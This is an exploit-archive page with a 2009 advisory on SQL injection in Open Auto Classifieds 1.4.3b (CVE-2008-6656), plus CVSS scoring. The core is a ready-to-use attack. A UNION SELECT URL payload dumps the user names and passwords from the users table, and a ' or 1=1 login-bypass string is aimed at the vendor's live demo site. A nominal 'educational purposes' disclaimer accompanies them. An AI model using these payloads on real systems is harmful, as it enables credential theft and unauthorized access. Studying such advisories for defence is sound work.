Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities

2009.04.09
Credit: InjEctOr
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6656
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | Kings of injection | | \/___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| Title :: Remote SQL Injection Author :: InjEctOr [s0f (at) w.cn] && Fisher762 [SQ7 (at) w.cn] Application :: Open Auto Classifieds vehicle listings manager v1.4.3b Download :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip Dork 1 :: use your mind Greets :: Allah , Muslims Hackers Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. --------------------------------------------[C o n t e x t]----------------------------------------- Expl0!t:: url : http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users and bypass login: http://openautoclassifieds.com/login.php << from demo site :) in Username field just type ' or 1=1 /* note: there is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top